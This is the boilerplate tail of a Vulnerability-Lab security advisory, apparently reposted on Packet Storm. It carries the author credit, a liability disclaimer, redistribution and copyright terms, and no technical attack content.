Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Source

Packet Storm